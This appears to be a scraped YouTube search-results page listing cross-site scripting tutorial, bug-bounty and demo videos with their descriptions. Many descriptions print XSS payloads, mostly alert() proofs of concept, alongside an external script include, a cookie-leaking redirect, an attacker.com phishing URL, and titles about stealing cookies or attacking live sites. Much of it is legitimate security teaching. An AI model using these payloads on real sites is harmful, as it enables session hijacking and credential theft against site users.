About 20 results out of 3380 (0.23 seconds)
Basic XSS Guide #1 -  Alert() - Redirection - Cookie Stealing

Channel Title : JackkTutorials

Views : 68477

Likes : 747

DisLikes : 42

Published Date : 2016-04-05T23:00:00.000Z

Visit https://bugcrowd.com/jackktutorials to get started in your security research career! G2A Re-link: https://www.g2a.com/?reflink=jackk1337 In this tutorial jackktutorials shows you how to get started with XSS Cross Site Scripting in BWAPP including Alert(), Webpage redirection and Cookie Stealing. LINKS AND RESOURCES ************************* Cookie Stealing Tutorial - https://youtu.be/Nv6CPs_j7hc XSS Definition - https://en.wikipedia.org/wiki/Cross-site_scripting Cookie Stealer Source - https://www.jackktutorials.com/?page_id=21 WAMP Server - http://www.wampserver.com/en/ GET MORE JACKKTUTORIALS! ******************************** Website: http://www.jackktutorials.com Forums: http://www.jackktutorials.com/forums Facebook: http://www.facebook.com/jackktutorials Twitter: http://www.twitter.com/jackk1337 Email: [email protected] Business Contact: [email protected] G2A Re-link: https://www.g2a.com/?reflink=jackk1337

Channel Title : ali hayali

Views : 24

Likes : 0

DisLikes : 0

Published Date : 2017-11-06T13:21:21.000Z

Cracking Websites with Cross Site Scripting - Computerphile

Channel Title : Computerphile

Views : 1015447

Likes : 21357

DisLikes : 417

Published Date : 2013-10-23T13:56:48.000Z

Audible free book: http://www.audible.com/computerphile JavaScript is dangerous! Why? How are websites vulnerable to it? Find out about bug-bounties from Tom Scott. More from Tom Scott: http://www.youtube.com/user/enyay and https://twitter.com/tomscott http://www.facebook.com/computerphile https://twitter.com/computer_phile This video was filmed and edited by Sean Riley. Computerphile is a sister project to Brady Haran's Numberphile. See the full list of Brady's video projects at: http://bit.ly/bradychannels

Channel Title : Rekcah Nexus

Views : 160

Likes : 1

DisLikes : 0

Published Date : 2013-03-26T04:20:33.000Z

video127 script alert('test1');/script http://example.com/  #cool

Channel Title : socialisten Area 51

Views : 145

Likes : 3

DisLikes : 2

Published Date : 2015-05-04T09:33:52.000Z

© scriptalert('cookie!');/script or are you strongbold/strong or let's see "what & we can ﶾ or cannot @bananorama do +test   - 00a0 link. äöü bo/b #tag next "l' H&M scriptalert('c');/script ' ' http://socialisten.at/ MENTION tab ends 00a0
"><img src=x onerror=alert(document.domain)>

Channel Title : charlie'z yoski\

Views : 1142

Likes : 0

DisLikes : 0

Published Date : 2015-02-08T23:14:12.000Z

"><img src=x onerror=alert(document.domain)>

Channel Title : kof2002

Views : 223

Likes : 1

DisLikes : 0

Published Date : 2014-03-27T23:56:01.000Z

t" onmouseover=prompt(document.domain);a=t
Steal sensitive information & credentials with XSS

Channel Title : Shawar Khan

Views : 3612

Likes : 48

DisLikes : 5

Published Date : 2016-05-05T18:21:21.000Z

Disclaimer: This video is only for educational purposes. I am not responsible for any damage done using this technique. A technique used for stealing sensitive information and credentials of a user using XSS vulnerability. View full article on http://shawarkhan.com

Channel Title : Martin Straka

Views : 159

Likes : 0

DisLikes : 0

Published Date : 2013-02-13T23:00:34.000Z

Lukasek " ' onmouseover=alert(123) script src=//websec.cz/t /script
Ellusionist HTML Injection + Persistent XSS

Channel Title : Spade

Views : 51

Likes : 1

DisLikes : 0

Published Date : 2017-03-04T06:15:30.000Z


Channel Title : HACK THE PLANET

Views : 78

Likes : 0

DisLikes : 0

Published Date : 2017-04-21T14:27:51.000Z

Cross Site Scripting (XSS)-3 (XSS stored IFRAME and COOKIE Exploit)

Channel Title : Hacking Monks

Views : 4839

Likes : 37

DisLikes : 4

Published Date : 2017-01-11T16:22:36.000Z

Hello guys. We are the hacking monks. Here is our blog – http://www.hackingmonks.net/p/home.html Here is our Facebook Page - https://www.facebook.com/Hacking-Monks-1589849474562976/?ref=settings
XSS Reflected On NutriSari Site | Bug Bounty

Channel Title : R,ando

Views : 171

Likes : 9

DisLikes : 0

Published Date : 2019-07-12T07:34:27.000Z

XSS Reflected On NutriSari Site | Bug Bounty Link Website = https://www.nutrisari.co.id/ XSS REFLECTED = (CODE DI COMMENT) Opening = (CODE DI COMMENT) Cookie = (CODE DI COMMENT) Domain = (CODE DI COMMENT) JSO Script = (CODE DI COMMENT) --------------------------------------------------------------------------------------------------------------- SUBSCRIBE TO MY CHANNEL : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw?view_as=subscriber —————————————————————————————- ADD TO MY FACEBOOK ACCOUNT : https://www.facebook.com/S4DM0M3NT5 —————————————————————————————- Hacker Group Facebook : https://www.facebook.com/groups/2328588267356227/ —————————————————————————————- HAVE FUNNY GUYSSS!!!!.... •CONTENT CREATOR •GAMING •EDITOR ••••• LIKE • SHARE • COMENT ••• SUBSCRIBE • •••••••••••• LIKE JUGA 3 VIDEO SEBELUMNYA:-https://www.youtube.com/watch?v=XgkORX-sa38 -https://www.youtube.com/watch?v=wApHwr9gNo8 -https://www.youtube.com/watch?v=RIIRMLZkHds&t Thank you for watching this video, see you at the next video!!! Byeee...
How to Redirect Stored XSS

Channel Title : Dragunman White Hat

Views : 562

Likes : 1

DisLikes : 0

Published Date : 2015-11-14T15:31:22.000Z

How Redirect Stored XSS What is Stored XSS Stored Xss attacks involve an attacker injecting a script referred to as the payload that is Permanently Stored Persisted on the target application for instance within a database.The classic Example of stored Xss is a malicious script inserted by an attacker in a comment field on a blog or in a forum post. Detail Of Stored Xss Cross Site Scripting Xss attacks are an instantiate of injection problems in which malicious scripts are injected into the otherwise benign and trusted web sites.Cross Site Scripting XSS vulnerabilities occur when 1 Data enters a Web application through an UN trusted source most frequently a web request. 2 The data is included in dynamic content that is sent to a web user without being validated for malicious code.The malicious content sent to the web browser often takes the form of a segment of JavaScript but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on Xss is almost limitless but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the users machine under the guise of the vulnerable site. Confidentiality: The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Access control: In some circumstances it may be possible to run arbitrary code on a victim's computer when cross site scripting is combined with other flaws Exposure Period Implementation: If bulletin-board style functionality is present, cross-site scripting may only be deterred at implementation time. More Information For open This Link http://www.dragunman.com/how-redirect-stored-cross-site-scripting-xss Just For Education Prupose.

Channel Title : Alexander Yang

Views : 206

Likes : 0

DisLikes : 0

Published Date : 2011-12-14T21:01:51.000Z

http://shafigullin.pro/share.html?' http://shafigullin.pro/share.html?" http://shafigullin.pro/share.html?#'
Hiding JavaScript in Picture Files for XSS

Channel Title : Don Does 30 Official

Views : 13964

Likes : 330

DisLikes : 18

Published Date : 2017-10-12T20:11:04.000Z

How to hide JavaScript in GIF, BMP, WEBP, PNM, or PGF files for the purposes of cross-site scripting. The site is required to receive the file without stripping metadata, and needs to be vulnerable to XSS to run the script (future tutorial). Git: https://github.com/jklmnn/imagejs
Open redirection vulnerability in ford website

Channel Title : MaXecurity Group

Views : 69

Likes : 4

DisLikes : 0

Published Date : 2019-07-09T11:41:40.000Z

Open redirection vulnerability in main ford website bug hunting hackerone bug bounty program What is an Open Redirection Vulnerability and How to Prevent it? An Open Redirection is when a web application or server uses a user submitted link to redirect the user to a given website or page. Even though it seems like a harmless action, to let a user decide on which page he wants to be redirected to, if exploited such technique can have a serious impact especially when combined with other vulnerabilities and tricks. How can An Open Redirect Web Vulnerability be exploited? Abusing the Trust Users Have in the Vulnerable Website Since the domain name in a URL is typically the only indicator for a user to recognize a legitimate website from a non-legitimate one, an attacker can abuse this trust to exploit an open redirect vulnerability on the vulnerable website, and redirect the user to a malicious page to execute further attacks, as explained in the following sections. Exploiting an Open Redirect Vulnerability for a Phishing Attack When the user clicks on a link of a legitimate website he often won’t be suspicious if suddenly a login prompt shows up. To launch a successful phishing attack the attacker sends the victim a link, for example via email, which exploits the vulnerability on the vulnerable website example.com: https://example.com/redirect.php?go=http://attacker.com/phish/ By exploiting the open redirect vulnerability on the legitimate website, the attacker is redirecting the victim to, http://attacker.com/phish which is a phishing page that is similar to the legit website. Once the visitor is on the attacker's malicious website, he enters his credentials on the login form which points to a script that is controlled by the attacker. The script is typically used to save the username and the password that is being typed in by the victim, which attackers typically use at a later stage to impersonate the victim on the legitimate website. The probability of a successful phishing attack are quite high since the domain example.com is shown when the user clicks on the link. Exploiting an open redirection vulnerability to launch a phishing attack. Exploiting an Open Redirect Vulnerability to Redirect Victims to Malicious Websites It is also possible to redirect an otherwise careful internet user to a site hosting attacker controlled content, like a browser exploit or a page executing a CSRF attack. As above, the chances that the victim clicks the link are higher if the site the link points to is trusted by the victim. An example is an open redirect in a trustworthy page like a banking site, that directs the victim to a page with a CSRF exploit against a vulnerable wordpress plugin. Exploiting An Open Redirection Vulnerability to Execute Code Redirecting to javascript: URIs An open redirection vulnerability in a web application can also be used to execute a XSS payload by redirecting to javascript: URIs. Those can be used to directly execute javascript code in the context of the vulnerable website. An example would be this: https://example.com/index.php?go=javascript:alert(document.domain) The above would show an alert window with the content from example.com. However in most modern browsers this only works when the redirection is javascript based. That means that a location header with javascript: will not execute the code and might show an error message instead. Another URI scheme that’s useful for an attacker is data:. While this does not work in webkit based Browsers like Google Chrome or Opera anymore, in Mozilla FireFox the attacker can still redirect to it. What this does is writes data directly to the browser window, which could ease the process of creating phishing pages, even without using a web server to host them. What is the Impact of an Open Redirection Vulnerability? As mentioned above the impacts can be many, and vary from theft of information and credentials, to the redirection to malicious websites containing attacker controlled content, which in some cases even cause XSS attacks. So even though an open redirection might sound harmless at first, the impacts of it can be severe should it be exploitable. How Can You Prevent Open Redirection Vulnerabilities? The easiest and most effective way to prevent vulnerable open redirects would be to not let the user control where your page redirects him to. If you have to redirect the user based on URLs, you should always use an ID which is internally resolved to the respective URL. If you want the user to be able to issue redirects you should use a redirection page that requires the user to click on the link instead of just redirecting them. You should also check that the url begins with http:// or https:// and also invalidate all other URLs to prevent the use of malicious URIs such as javascript: Vulnerability Classification and Severity Table
stored xss bypassed ||onmouseover

Channel Title : Being Sandip

Views : 87

Likes : 2

DisLikes : 1

Published Date : 2018-06-10T06:13:10.000Z

victim site: https://bit.ly/2sYFIvw Many bugs are found on this site.short demo .checkout
XSS (cross site scripting ) filter evasion series stage 8

Channel Title : Vishwaraj Bhattrai

Views : 1088

Likes : 3

DisLikes : 0

Published Date : 2015-02-02T06:19:14.000Z

payload used : javascript:alert(document.domain); challenge link : http:--xss-quiz.int21h.jp-stage008.php
Copy of xss'-confirm(document.domain)-'

Channel Title : Deepak tqwe

Views : 18

Likes : 0

DisLikes : 1

Published Date : 2017-03-01T17:54:54.000Z

XSS on Google Search - Sanitizing HTML in The Client?

Channel Title : LiveOverflow

Views : 339478

Likes : 9807

DisLikes : 149

Published Date : 2019-03-31T11:57:21.000Z

An actual XSS on google.com by Masato Kinugawa. It abuses a parsing differential between a JavaScript enabled and disabled context. The fix: https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa -=[ ❤️ Support ]=- → per Video: https://www.patreon.com/join/liveoverflow → per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join -=[ 🔴 Stuff I use ]=- → Microphone:* https://amzn.to/2LW6ldx → Graphics tablet:* https://amzn.to/2C8djYj → Camera#1 for streaming:* https://amzn.to/2SJ66VM → Lens for streaming:* https://amzn.to/2CdG31I → Connect Camera#1 to PC:* https://amzn.to/2VDRhWj → Camera#2 for electronics:* https://amzn.to/2LWxehv → Lens for macro shots:* https://amzn.to/2C5tXrw → Keyboard:* https://amzn.to/2LZgCFD → Headphones:* https://amzn.to/2M2KhxW -=[ 🐕 Social ]=- → Twitter: https://twitter.com/LiveOverflow/ → Website: https://liveoverflow.com/ → Subreddit: https://www.reddit.com/r/LiveOverflow/ → Facebook: https://www.facebook.com/LiveOverflow/ -=[ 📄 P.S. ]=- All links with "*" are affiliate links. LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Programm.
Cross site scripting (XSS) in Amazon

Channel Title : kori ajay

Views : 202

Likes : 6

DisLikes : 0

Published Date : 2019-05-02T09:21:38.000Z

Stored XSS
XSS in sandbox domains GOOGLE

Channel Title : MMMAAA OOOUUU

Views : 234

Likes : 1

DisLikes : 0

Published Date : 2015-07-16T06:27:23.000Z

Google uses a range of sandbox domains to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data. For this reason, we recommend using alert(document.domain) instead of alert(1) as your default XSS payload. In particular, if you see script execution in any subdomains of the domains in this list: ad.doubleclick.net googleusercontent.com googlecode.com codespot.com feeds.feedburner.com googleadservices.com googledrive.com googlegroups.com {your-blog-name}.blogspot.com {your-app-name}.appspot.com
Cross Site in Bitcoinget | Faizan Online |

Channel Title : Faizan Online

Views : 116

Likes : 5

DisLikes : 0

Published Date : 2019-07-04T19:04:33.000Z

xss in bitcoinget.com payload test img src x onerror alert document domain facebook.com/iamfaizanakhtar
Exploiting a Cross-site Scripting (XSS) vulnerability on Facebook

Channel Title : acunetix

Views : 41878

Likes : 79

DisLikes : 20

Published Date : 2010-07-27T09:53:44.000Z

The following video shows how an attacker may exploit a cross-site scripting vulnerability on Facebook.com regardless of the HTTPOnly cookie protection used. Of course, this goes way beyond showing an "alert()" popup in Javascript, since the attacker is also able to hijack the victim's Facebook account. We also published an article to explain in more technical detail the works behind abusing such a flaw. http://www.acunetix.com/websitesecurity/xss-facebook.htm Facebook rates as the second most popular website on the internet with 400 million active users. When such a website has common web application security flaws, they are going to be abused for one's gain. When we came across an obvious cross-site scripting vulnerability, we decided to show that an attacker could do that. We worked with Facebook to make sure that this vulnerability is fixed. We would like to thank their security team for quickly fixing it. For more information visit http://www.acunetix.com
Hacking 101 - Cross site scripting - web security tutorial

Channel Title : GhostBit

Views : 227

Likes : 6

DisLikes : 0

Published Date : 2019-03-16T09:24:30.000Z

Hello World! Welcome to my channel. In this video, I am Going to show you what is Cross site scripting? And how to use it. What is Cross site scripting? Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. There are 3 types of XSS, I'm going to talk about the 2 most used: ►Reflected XSS Attack: When an attacker inject his malicious script into a search query, a search box, or the end of an URL, it's called Reflected XSS Attack. It's like throwing a ball against a wall and receive him back. ►Stored XSS Attack: Is when an injected XSS script is stored permanently on a website, for example in a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the site with the malicious code. How to Protect Yourself: The primary defenses against XSS are described in the OWASP XSS Prevention Cheat Sheet. Also, it's crucial that you turn off HTTP TRACE support on all web servers. An attacker can steal cookie data via Javascript even when document.cookie is disabled or not supported by the client. This attack is mounted when a user posts a malicious script to a forum so when another user clicks the link, an asynchronous HTTP Trace call is triggered which collects the user's cookie information from the server, and then sends it over to another malicious server that collects the cookie information so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all web servers. Thanks for watching my video hit like Button, Subscribe to this channel and press bell icon for more videos. ►"Install bwapp in xampp": https://youtu.be/N95oGV4QNro subscribe": https://goo.gl/9kbN6d ►"Free Ethical Hacking Course": https://goo.gl/oVMSpf ►"Hacking 101- Find Sub-Domain- web security tutorial":https://youtu.be/vLFoFi7RJ3c ►"Domain Information Gathering": https://youtu.be/SL3nufBODUY ►"Convert Any File Or Folder Into ISO File.":https://youtu.be/8F-YLnrwjxA ►"how to hack windows 10." https://www.youtube.com/watch?v=T8mtHFA2wPI ►"How to use phishing attacks for Facebook." https://www.youtube.com/watch?v=TaWKeS7yzBg ►"how to change IP address and location." https://www.youtube.com/watch?v=-yzgPrs1oms ~-~~-~~~-~~-~- ~-~~-~~~-~~-~- Tobu - Colors [NCS Release] https://youtu.be/MEJCwccKWG0 http://www.youtube.com/tobuofficial Music promoted by Audio Library https://youtu.be/PQC7VaL7xlc -~-~~-~~~-~~-~-

Channel Title : Alyssa Herrera

Views : 154

Likes : 15

DisLikes : 0

Published Date : 2016-07-01T19:13:09.000Z

No commentary Over watch Competitive. Pre-tournament training and climbing to 70. ► Current Rank http://masteroverwatch.com/profile/shared/0a2fd3d5b21b21ac ► TWITCH https://www.twitch.tv/alyssa_gryphon -~-~~-~~~-~~-~- Please watch: "[No Commentary] Competive Overwatch Vod #2" https://www.youtube.com/watch?v=Pf0HxBOylcI -~-~~-~~~-~~-~-
XSS (cross site scripting ) filter evasion series stage 6

Channel Title : Vishwaraj Bhattrai

Views : 1206

Likes : 6

DisLikes : 0

Published Date : 2015-02-01T10:52:56.000Z

xss vector used is onmouseover="prompt(document.domain);"" Link for the challenge 6 http:-- xss-quiz.int21h.jp-stage-no6.php
How to Attack on cross site scripting vulnerable websites (XSS)

Channel Title : A Team

Views : 935

Likes : 5

DisLikes : 5

Published Date : 2018-08-20T18:39:08.000Z

How to Attack on cross site scripting vulnerable site (XSS) Hey guys! Rogue Flame from A Team here back again with another video, in this video, we will be looking at how to attack Vulnerable cross-site script XSS website using google dork. cross site scripting vulnerable website find cross site scripting vulnerable website (XSS) How to Attack on cross site scripting vulnerable website (XSS) XSS vulnerable attack XSS vulnerable sites 2018.XSS vulnerable website I Hope you enjoy/enjoyed the video. If you have any questions or suggestions feel free to ask them in the comments section Thanks for watching! social media Facebook https://www.facebook.com/ateamadmin Благодаря за гледането 感谢您观看 Merci d'avoir regardé Grazie per la visione Gracias por ver شكرا للمشاهدة देखने के लिए धन्यवाद
Cross-Site Scripting Explained - Part 7: HTML Events

Channel Title : webpwnized

Views : 5099

Likes : 17

DisLikes : 0

Published Date : 2012-01-29T16:45:52.000Z

Author: Jeremy Druin Twitter: @webpwnized Description: This video demonstrates injecting cross site scripts into HTML events. The example requires a prefix to close off an existing JavaScript statement in the onclick event targetted. Any script injected into the HTML event will be executed when the user clicks the BACK button on the page. Mutillidae is a free web application which is vulnerable on purpose to give a training envoronment for pen testers, security enthusiasts, universities, and as a target for evaluating vulnerability assessment tools. Updates about Mutillidae are announced on Twitter at @webpwnized. Mutillidae can be downloaded from irongeek.com Thank you for watching. Please support this channel. Up vote, subscribe or even donate by clicking "Support" at https://www.youtube.com/user/webpwnized! The webpwnized YouTube channel is dedicated to information security, security testing and ethical hacking. There is an emphasis on web application security but many other topics are covers. Some of these include forensics, network security, security testing tools and security testing processes. The channel provides videos to encourage software developers and system administrators to perform security testing. Also, the channel educates the next generation of security testers and bug bounty hunters who want to respectfully, legally and ethically help system owners that allow security testing.
How To Link an External JavaScript File to an HTML Document

Channel Title : Robin Haney

Views : 62393

Likes : 223

DisLikes : 19

Published Date : 2015-10-29T23:23:54.000Z

My Recording Equipment Set-up and other things - https://www.amazon.com/shop/robinhaney Grab a 7 Day FREE Trial of Treehouse Techdegree Here - http://treehouse.7eer.net/c/251417/228915/3944 Subscribe To The Channel Here - https://www.youtube.com/channel/UCHLgef6oQmhazaaHAwwcVyg?sub_confirmation=1
XSS (Cross Site Scripting) Stealing a cookie Kitabisa.com

Channel Title : Richie Daniel

Views : 329

Likes : 0

DisLikes : 0

Published Date : 2018-11-29T06:40:08.000Z

Unpatched Facebook (investor.fb.com) User-Agent Cross Site Scripting Vulnerability

Channel Title : Xowia Vulnerability Lab

Views : 442

Likes : 0

DisLikes : 0

Published Date : 2015-05-05T06:05:06.000Z

Here is the user-agent cross site scripting vulnerability in investor.fb.com that is still unpatched. Our security researchers reported it to Facebook but according to them this is not a security bug. And we asked for make a public disclosure, in return they don't have any issue.
XSS (cross site scripting ) filter evasion series stage 7

Channel Title : Vishwaraj Bhattrai

Views : 782

Likes : 6

DisLikes : 0

Published Date : 2015-02-02T06:02:12.000Z

Payload used : a onmouseover=prompt(document.domain); challenge link : s-quiz.int21h.jp-stage07.php
Orkut - xss'onmouseover='alert(1)'// @ dekeeu %3C\x22

Channel Title : dekeeu

Views : 541

Likes : 3

DisLikes : 0

Published Date : 2014-10-02T16:45:43.000Z

Orkut - Orkut - xss"onmouseover="alert(1)"// @ dekeeu @ dekeeu
window location in JavaScript

Channel Title : kudvenkat

Views : 37450

Likes : 125

DisLikes : 3

Published Date : 2015-02-24T20:22:35.000Z

Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat/playlists Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2015/02/windowlocation-in-javascript.html In this video we will discuss the use of Location object. The Window.location property returns a Location object that can be used to get information about the current page. Window.location property can also be used to redirect the browser to a new page. In Part 73 of JavaScript tutorial we discussed how to detect if JavaScript is enabled by using [noscript] element. Another way is by using window.location property. Let us use the example we worked with in Part 73. We will use window.location property along with [noscript] element to detect if JavaScript is enabled. Add a new HTML page to your project. Name it Default.htm. Copy and paste the following HTML and JavaScript. [html] [head] [script] // If JavaScript is enabled this code redirects the user to HTMLPag1.htm // If JavaScript is disable this code will not execute and the user reamains on this // page and he gets to the see the message that JavaScript is disabled. window.location = "/HTMLPage1.htm"; [/script] [/head] [body] [h1]It seems that you have disabled JavaScript. Please enable JavaScript.[/h1] [/body] [/html] We don't need to make any modification to HTMLPage1.htm. At this point If you have JavaScript enabled, and if you visit Default.htm page, you will be redirected to HTMLPage1.htm If you have JavaScript disabled, and if you visit Default.htm page, you will reamin on Default.htm page and you will get to see the message that says JavaScript is disabled. window.location property is especially useful if you have 2 sites 1. One for users with JavaScript 2. Another for users without JavaScript Make the home-page of Non-JavaScript website the default page. In the default page include the following JavaScript code to redirect the user to the JavaScript-EnabledSite.com window.location = "http://www.JavaScript-EnabledSite.com"; If you have JavaScript enabled, you will be redirected to JavaScript enabled website. If you have JavaScript disabled, you will not be redirected and stay with the website which works without JavaScript. Some of the useful properties of the location object window.location.href - Returns the URL of the current page window.location.hostname - Returns the domain name window.location.protocol - Returns the protocol (http or https) window.location.pathname - Returns the path of the current page [script type="text/javascript"] document.write("window.location.href = " + window.location.href + "[br/]"); document.write("window.location.hostname = " + window.location.hostname + "[br/]"); document.write("window.location.pathname = " + window.location.pathname + "[br/]"); document.write("window.location.protocol = " + window.location.protocol + "[br/]"); [/script] Output : window.location.href = http://localhost:57695/Default.htm window.location.hostname = localhost window.location.pathname = /Default.htm window.location.protocol = http:
XSS Cross Site Scripting Demonstration

Channel Title : Imperva

Views : 189898

Likes : 454

DisLikes : 35

Published Date : 2009-07-02T03:17:49.000Z

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. The Script Injection video should be watched before this video for greater understanding.
A Tutorial On XSS Attack (Cross Site Scripting)

Channel Title : Mushahid Ali

Views : 2004

Likes : 14

DisLikes : 2

Published Date : 2016-09-05T12:45:59.000Z

Sup, Guys. This Is Mushahid Ali Doing A TUTORIAL On XSS Attack. Hope You Guys Liked It. Also Please Rate, Like, Comment, Share And Subscribe To Get The Latest Videos On Hacks , Comedy And Stuff. Here Are Some Of The XSS Code's : scriptalert1'XXSED By Mushahid Ali!'1/script code onclick="alert1'XXSED By Mushahid Ali'1"CLICK HERE TO GET YOURSELF HACKED !/code script document.location="www.google.com"document.cookie /script " script alert1"XSSED-By-Mushahid Ali"1 /script " script alert1/XSSED-By-Mushahid Ali/1 /script SCRIPT alert1"XSSED-By-Mushahid Ali"1;// /SCRIPT %253cscript%253ealert1/XSSED-By-Mushahid Ali/1%253c/script%253e foo script alert1/XSSED-By-Mushahid Ali/1 /script scr script ipt alert1/XSSED-By-Mushahid Ali/1 /scr /script ipt Most Importantly, I Smile A Lot And Want To Make You Feel Happy. Subscribe! My FaceBook : https://www.facebook.com/mushahid.ali.777 My Facebook Page : https://www.facebook.com/MushahidAliOfficialPage/ Follow Me @ Twitter : https://www.twitter.com/alimushahid24/ My Official Website : https://officialpage-f880e.firebaseapp.com/ The Background Theme Used In The Video Is Different Heaven & EH!DE - My Heart [NCS Release]. Here's The A Link To It : https://www.youtube.com/watch?v=jK2aIUmmdP4 Thanks For Watching And Don't Forget To Keep Smiling =D !
Cross-Site Scripting(XSS) using image file upload

Channel Title : Shawar Khan

Views : 15305

Likes : 72

DisLikes : 38

Published Date : 2015-07-21T04:39:38.000Z

In this video i will tell you about executing cross-site scripting(XSS) attack using a file upload.This method can be used with other file types like bmp png and other types. Site: Shawarkhan.com Facebook: www.facebook.com/shawarkhanskofficial

Channel Title : test test

Views : 158

Likes : 0

DisLikes : 1

Published Date : 2014-12-28T19:55:03.000Z

I created this video with the YouTube Video Editor (http://www.youtube.com/editor)
XSS On Avira

Channel Title : TANUJ JANE

Views : 216

Likes : 0

DisLikes : 0

Published Date : 2014-06-12T14:30:18.000Z

From XSS to Domain Admin - Demo

Channel Title : eLearnSecurity

Views : 959

Likes : 4

DisLikes : 0

Published Date : 2015-07-05T14:41:42.000Z

http://ow.ly/PcdcK A demonstration of a real world network penetration test. The network has up-to-date client and server operating systems, a DMZ between two firewalls and a company website. IT Security Researcher, Davide "GiRa" Girardi, tries to gain full access to an Active Directory Administrator Account. Watch the full pentest for FREE here: http://ow.ly/PcdcK

Channel Title : Abk Khan

Views : 113

Likes : 0

DisLikes : 0

Published Date : 2015-02-09T18:43:31.000Z

"><img src=x onerror=prompt(document.domain);>
JavaScript Executor in Selenium WebDriver

Channel Title : Specialize Automation

Views : 4063

Likes : 26

DisLikes : 9

Published Date : 2017-10-29T10:58:57.000Z

Learn how to use javascript in selenium and top 10 javascript functions in Selenium Webdriver. Using Javascript we can directly interact with the HTML dom to work on webpage. JavaScript in selenium Webdriver, How to navigate URL using Javascript, How to fetch webElement using Javascript, How to refresh page using Javascript, How to get innertext of a page using Javascript, How to click on a webelement using Javascript, How to open a link in same tab using Javascript, How to Scroll in selenium Webdriver using Javascript, How to scroll to a element in selenium using Javascript, How to do vertical scroll in selenium using Javascript, How to highlight webElement in selenium using Javascript, How to find total frames in selenium using Javascript, String script = "window.location = \'"+url+"\'"; JavascriptExecutor js =(JavascriptExecutor)driver; js.executeScript(script) js.executeScript("history.go(0)"); String sText =js.executeScript("return document.title;").toString(); WebElement search =(WebElement) js.executeScript("return document.getElementById('searchBtn');"); String frames = js.executeScript("document.frames.length;").toString(); js.executeScript("arguments[0].scrollIntoView(true);", element); js.executeScript("window.scrollBy(300,2000)"); js.executeScript("arguments[0].setAttribute('style', arguments[1]);", ele, "background:" + "yellow; color: Red; border: 4px dotted solid yellow;"); js.executeScript("arguments[0].click();",element); js.executeScript("arguments[0].setAttribute('target','_self');",element); // to open in same tab js.executeScript("alert('Enter your Facebook crednetials');"); js.executeScript("confirm('Enter your Facebook crednetials');"); js.executeScript("prompt('Enter your crednetials',’Enter domain’);") Linkedin: https://www.linkedin.com/in/aditya-kumar-roy-b3673368/ Facebook: https://www.facebook.com/SpecializeAutomation/
'"></script><img src=x onerror=alert(document.domain)>TEST

Channel Title : charlie'z yoski\

Views : 243

Likes : 0

DisLikes : 1

Published Date : 2014-04-22T15:51:04.000Z

'"></script><img src=x onerror=alert(document.domain)>TEST

Facebook Page Like Box ::